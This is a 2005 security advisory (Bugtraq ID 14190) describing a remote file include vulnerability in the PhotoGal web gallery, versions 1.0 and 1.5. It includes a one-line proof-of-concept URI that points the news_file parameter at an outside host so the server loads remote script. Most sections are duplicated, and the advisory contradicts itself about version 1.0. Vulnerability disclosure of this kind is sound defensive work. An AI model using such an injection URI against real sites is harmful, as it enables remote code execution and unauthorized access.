PhotoGal News_File Remote File Include Vulnerability
BID:14190
Info
PhotoGal News_File Remote File Include Vulnerability
| Bugtraq ID: | 14190 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 07 2005 12:00AM |
| Updated: | Jul 07 2005 12:00AM |
| Credit: | Credit is given to skdaemon porra <[email protected]> for the discovery of this vulnerability. |
| Vulnerable: |
PhotoGal PhotoGal 1.5 PhotoGal PhotoGal 1.0 |
| Not Vulnerable: | |
Discussion
PhotoGal News_File Remote File Include Vulnerability
PhotoGal is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
Successful exploitation of this issue will allow an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
Reports indicate that this issue may have been addressed in version 1.0, but this has not been confirmed.
PhotoGal is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
Successful exploitation of this issue will allow an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
Reports indicate that this issue may have been addressed in version 1.0, but this has not been confirmed.
Exploit / POC
PhotoGal News_File Remote File Include Vulnerability
No exploit is required.
The following proof of concept URI is available:
http://www.example.com/[path_to_photogal]/ops/gals.php?news_file=http://www.example.com
No exploit is required.
The following proof of concept URI is available:
http://www.example.com/[path_to_photogal]/ops/gals.php?news_file=http://www.example.com
Solution / Fix
PhotoGal News_File Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.